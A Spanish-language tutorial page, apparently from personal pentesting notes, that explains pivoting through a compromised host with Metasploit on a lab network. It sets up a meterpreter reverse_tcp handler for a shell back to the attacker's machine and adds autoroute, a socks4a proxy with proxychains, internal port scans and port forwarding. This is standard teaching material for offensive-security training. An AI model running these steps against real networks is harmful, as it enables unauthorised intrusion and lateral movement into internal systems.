> For the complete documentation index, see [llms.txt](https://4lec4st.gitbook.io/4lec4st/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://4lec4st.gitbook.io/4lec4st/docs/pivoting/pivoting-con-metasploit.md).

# Pivoting con Metasploit

Vamos a ver cómo hacer **pivoting** con Metasploit. El escenario es el siguiente:

* Tu máquina: `192.168.1.143`
* Máquina intermedia (pivot): `192.168.1.142`
  * Interfaz 1: `192.168.1.142` (conectada contigo)
  * Interfaz 2: `10.10.10.2` (conectada a la red interna)
* Máquina objetivo interna: `10.10.10.3` (solo accesible desde la 10.10.10.2)

#### 🔐 Objetivo: Acceder a `10.10.10.3` desde tu máquina usando Metasploit y `pivoting` a través de `192.168.1.142`.

***

## 1. Obtener sesión en la máquina pivot (`192.168.1.142`)

Primero, necesitas comprometer la máquina `192.168.1.142` y obtener una sesión `meterpreter`.

```bash
msfconsole
```

```bash
use exploit/multi/handler
set payload linux/x86/meterpreter/reverse_tcp
set LHOST 192.168.1.143
set LPORT 4444
run
```

Y en la máquina víctima (192.168.1.142), ejecutas el payload que te conecta de vuelta.

Una vez tengas la sesión meterpreter, deberías ver algo como:

```bash
[*] Meterpreter session 1 opened
```

***

## 2. Verifica las interfaces de red de la máquina comprometida

En `meterpreter`:

```bash
run post/multi/manage/ifconfig
```

Esto te debe mostrar algo como:

```bash
eth0: 192.168.1.142
eth1: 10.10.10.2
```

Perfecto, ahora puedes hacer pivoting hacia la red `10.10.10.0/24`.

***

## 3. Cargar el módulo `autoroute`

En la sesión `meterpreter`:

```bash
run post/multi/manage/autoroute SUBNET=10.10.10.0 NETMASK=255.255.255.0
```

Esto le dice a Metasploit que enrute todo el tráfico hacia `10.10.10.0/24` a través de esta sesión.

Verifica que se haya añadido correctamente:

```bash
run autoroute -p
```

***

## 4. Configurar un `socks4a` proxy (opcional pero útil)

Esto te permite enrutar herramientas externas (nmap, proxychains, etc.) a través del pivot.

En otra pestaña de `msfconsole`:

```bash
use auxiliary/server/socks4a
run
```

Luego, edita tu archivo `/etc/proxychains.conf` para incluir:

```bash
socks4 127.0.0.1 1080
```

Ahora puedes hacer, por ejemplo:

```bash
proxychains nmap -Pn -sT -p 22 10.10.10.3
```

***

## 5. Usar módulos de Metasploit contra la red interna

Como ya añadiste la ruta, ahora puedes lanzar exploits o escaneos directamente desde Metasploit contra la máquina `10.10.10.3`.

Por ejemplo:

```bash
use auxiliary/scanner/portscan/tcp
set RHOSTS 10.10.10.3
set PORTS 22,80,443
run
```

***

## 6. (Opcional) Port Forwarding manual

Si en vez de usar `autoroute` prefieres redirigir un puerto, en la sesión `meterpreter` puedes hacer:

```bash
portfwd add -l 8080 -p 80 -r 10.10.10.3
```

Esto hace que si accedes a `http://127.0.0.1:8080` en tu máquina, estarás viendo el puerto 80 de `10.10.10.3`.

## Gráfico del escenario

<figure><img src="/files/9Zj7AtDZLEsrrB8Hxzw4" alt=""><figcaption></figcaption></figure>
